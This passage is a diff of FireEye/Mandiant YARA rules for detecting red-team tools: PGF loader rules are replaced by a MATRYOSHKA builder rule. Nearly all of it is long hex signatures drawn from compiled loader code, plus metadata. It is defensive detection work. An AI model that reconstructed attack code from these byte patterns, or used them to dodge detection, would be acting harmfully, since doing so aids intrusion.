8D 0D 11 B9 05 00 48 8B 05 A2 7B 06 00 FF D0 48 8D 15 0D B9 05 00 48 89 C1 48 8B 05 97 7B 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 5A 7B 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 22 7B 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 59 FB FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 00 FB FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 94 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 00 FC 00 00 48 89 D8 48 89 C1 E8 45 AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 63 9C 01 00 48 89 D8 48 89 C1 E8 28 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
-		$cond4 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 D3 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 65 B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 EC FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AF 96 01 00 48 8D 45 AF 48 89 C1 E8 F3 FE 00 00 48 8B 05 78 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6E B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 B5 B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 64 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 5A B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 73 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 45 C8 05 00 48 8B 05 B4 8A 06 00 FF D0 48 8D 15 41 C8 05 00 48 89 C1 48 8B 05 A9 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 6C 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 54 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 33 FA FF FF 48 89 C1 E8 D5 FC FF FF BB 00 00 00 00 EB 57 90 EB 01 90 48 83 45 E0 08 E9 DF FE FF FF 48 8B 45 F0 48 89 45 C0 48 8B 45 C0 8B 40 3C 48 63 D0 48 8B 45 F0 48 01 D0 48 89 45 B8 48 8B 45 B8 8B 40 28 89 C2 48 8B 45 F0 48 01 D0 48 89 45 B0 48 8B 45 B0 48 8D 15 DA F9 FF FF 48 89 C1 E8 7C FC FF FF BB 01 00 00 00 48 8D 85 78 FD FF FF 48 89 C1 E8 CE 9C 01 00 83 FB 01 EB 38 48 89 C3 48 8D 45 AF 48 89 C1 E8 3A FC 00 00 48 89 D8 48 89 C1 E8 4F AA 00 00 48 89 C3 48 8D 85 78 FD FF FF 48 89 C1 E8 9D 9C 01 00 48 89 D8 48 89 C1 E8 32 AA 00 00 90 48 81 C4 28 07 00 00 5B 5D C3 }
+		$sb1 = { 8D 8D [4] E8 [4] 49 89 D0 C6 [2-6] 01 C6 [2-6] 01 [0-8] C7 44 24 ?? 0E 00 00 00 4C 8D 0D [4] 48 8D 8D [4] 48 89 C2 E8 [4] C6 [2-6] 01 C6 [2-6] 01 48 89 E9 48 8D 95 [4] E8 [4] 83 [2] 01 0F 8? [4] 48 01 F3 48 29 F7 48 [2] 08 48 89 85 [4] C6 [2-6] 01 C6 [2-6] 01 C6 [2-6] 01 48 8D 8D [4] 48 89 DA 49 89 F8 E8 }
+		$sb2 = { 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 68 00 00 00 48 8B [2] 48 8D [2] 48 89 [3] 48 89 [3] 0F 11 44 24 ?? C7 44 24 ?? 08 00 00 0C C7 44 24 ?? 00 00 00 00 31 ?? 48 89 ?? 31 ?? 45 31 ?? 45 31 ?? E8 [4] 83 F8 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_3 : FILE
+rule FIREEYE_RT_APT_Builder_PY_MATRYOSHKA_1
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/c02594972dbab6d489b46c5dee059e66. Identifies dllmain_hook x86 payloads."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "adf91482-6e04-5d11-bc00-4b1c7a802c49"
-		date = "2020-12-09"
+		id = "0135f3bb-28b3-5fc4-85a2-b12c46c8bc45"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_3.yar#L4-L20"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_PY_MATRYOSHKA_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4414953fa397a41156f6fa4f9462d207"
-		logic_hash = "24d2caad1d740ccbff0cf111a05ecad20ed06f311d530d8de86050d916da32ce"
+		hash = "25a97f6dba87ef9906a62c1a305ee1dd"
+		logic_hash = "71b26f4b319429ac356b55d22bccd1da85894d61f8c96452422de78d2d893420"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		rev = 4
+		quality = 50
+		tags = ""
+		rev = 1
 
 	strings:
-		$cond1 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF 90 EE 01 6D C7 85 30 F9 FF FF 6C FE 01 6D 8D 85 34 F9 FF FF 89 28 BA CC 19 00 6D 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BB A6 00 00 A1 48 A1 05 6D C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B8 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 56 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 DF B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 52 0B 01 00 A1 4C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 51 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 EF AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 82 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 84 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 2C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 0C 40 05 6D A1 5C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 18 40 05 6D 89 04 24 A1 60 A1 05 6D FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 54 A1 05 6D FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 9C A1 05 6D C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 00 6D 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 00 6D 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 5D BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 48 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A0 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 FD BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 75 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 76 A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
-		$cond2 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF B0 EF 3D 6A C7 85 30 F9 FF FF 8C FF 3D 6A 8D 85 34 F9 FF FF 89 28 BA F4 1A 3C 6A 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 B3 A6 00 00 A1 64 A1 41 6A C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 B0 AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 4E 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 D7 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 4A 0B 01 00 A1 68 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 49 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 E7 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 7A FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 7C AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 62 40 41 6A A1 78 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 6E 40 41 6A 89 04 24 A1 7C A1 41 6A FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 41 6A FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 41 6A C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 3C 6A 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 3C 6A 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 55 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 40 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 98 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 F5 BB 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 6D A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 6E A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
-		$cond3 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 2C F9 FF FF F0 EF D5 63 C7 85 30 F9 FF FF CC FF D5 63 8D 85 34 F9 FF FF 89 28 BA 28 1B D4 63 89 50 04 89 60 08 8D 85 14 F9 FF FF 89 04 24 E8 BF A6 00 00 A1 64 A1 D9 63 C7 85 18 F9 FF FF FF FF FF FF FF D0 C7 44 24 08 04 01 00 00 8D 95 B6 FD FF FF 89 54 24 04 89 04 24 E8 BC AE 00 00 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 8B 03 00 00 8D 45 BF 89 C1 E8 5A 0B 01 00 8D 85 9C FD FF FF 8D 55 BF 89 54 24 04 8D 95 B6 FD FF FF 89 14 24 C7 85 18 F9 FF FF 01 00 00 00 89 C1 E8 E3 B5 01 00 83 EC 08 8D 45 BF 89 C1 E8 56 0B 01 00 A1 68 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 89 44 24 04 C7 04 24 08 00 00 00 E8 55 AE 00 00 83 EC 08 89 45 D0 83 7D D0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 8C 02 00 00 C7 45 E4 00 00 00 00 C7 45 E0 00 00 00 00 C7 85 74 F9 FF FF 28 04 00 00 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 F3 AD 00 00 83 EC 08 89 45 DC 83 7D DC 00 74 67 8D 85 9C FD FF FF C7 44 24 04 00 00 00 00 8D 95 74 F9 FF FF 83 C2 20 89 14 24 89 C1 E8 86 FF 00 00 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 12 8B 85 88 F9 FF FF 89 45 E4 8B 85 8C F9 FF FF 89 45 E0 8D 85 74 F9 FF FF 89 44 24 04 8B 45 D0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 88 AD 00 00 83 EC 08 89 45 DC EB 93 8B 45 D0 89 04 24 A1 44 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 83 7D E4 00 74 06 83 7D E0 00 75 0F C7 85 10 F9 FF FF 00 00 00 00 E9 AD 01 00 00 C7 04 24 7E 40 D9 63 A1 7C A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 04 C7 44 24 04 8A 40 D9 63 89 04 24 A1 80 A1 D9 63 FF D0 83 EC 08 89 45 CC 89 E8 89 45 D8 8D 85 6C F9 FF FF 89 44 24 04 8D 85 70 F9 FF FF 89 04 24 A1 70 A1 D9 63 FF D0 83 EC 08 C7 45 D4 00 00 00 00 8B 55 D8 8B 85 6C F9 FF FF 39 C2 0F 83 F5 00 00 00 8B 45 D8 8B 00 3D FF 0F 00 00 0F 86 D8 00 00 00 8B 45 D8 8B 00 39 45 CC 73 19 8B 45 D8 8B 00 8B 55 CC 81 C2 00 10 00 00 39 D0 73 07 C7 45 D4 01 00 00 00 83 7D D4 00 0F 84 AF 00 00 00 8B 45 D8 8B 00 39 45 E4 0F 83 A1 00 00 00 8B 45 D8 8B 00 8B 4D E4 8B 55 E0 01 CA 39 D0 0F 83 8C 00 00 00 B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 50 F9 FF FF 83 C0 04 39 D0 72 F2 8B 45 D8 8B 00 C7 44 24 08 1C 00 00 00 8D 95 50 F9 FF FF 89 54 24 04 89 04 24 A1 C8 A1 D9 63 C7 85 18 F9 FF FF 02 00 00 00 FF D0 83 EC 0C 8B 85 64 F9 FF FF 83 E0 20 85 C0 74 2E 8B 45 D8 8B 00 C7 44 24 04 30 14 D4 63 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 59 FC FF FF C7 85 10 F9 FF FF 00 00 00 00 EB 58 90 EB 01 90 83 45 D8 04 E9 FA FE FF FF 8B 45 E4 89 45 C8 8B 45 C8 8B 40 3C 89 C2 8B 45 E4 01 D0 89 45 C4 8B 45 C4 8B 50 28 8B 45 E4 01 D0 89 45 C0 C7 44 24 04 30 14 D4 63 8B 45 C0 89 04 24 C7 85 18 F9 FF FF 02 00 00 00 E8 FF FB FF FF C7 85 10 F9 FF FF 01 00 00 00 8D 85 9C FD FF FF 89 C1 E8 61 BC 01 00 83 BD 10 F9 FF FF 01 EB 70 8B 95 1C F9 FF FF 8B 85 18 F9 FF FF 85 C0 74 0C 83 E8 01 85 C0 74 2D 83 E8 01 0F 0B 89 95 10 F9 FF FF 8D 45 BF 89 C1 E8 4C 08 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 A4 A6 00 00 89 95 10 F9 FF FF 8D 85 9C FD FF FF 89 C1 E8 01 BC 01 00 8B 85 10 F9 FF FF 89 04 24 C7 85 18 F9 FF FF FF FF FF FF E8 79 A6 00 00 90 8D 85 14 F9 FF FF 89 04 24 E8 7A A3 00 00 8D 65 F4 5B 5E 5F 5D C3 }
-		$cond4 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? 90 EE 01 6D C7 85 ?? ?? ?? ?? 6C FE 01 6D 8D 85 ?? ?? ?? ?? 89 28 BA CC 19 00 6D 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 0C 40 05 6D A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 18 40 05 6D 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 00 6D 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 00 6D 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? 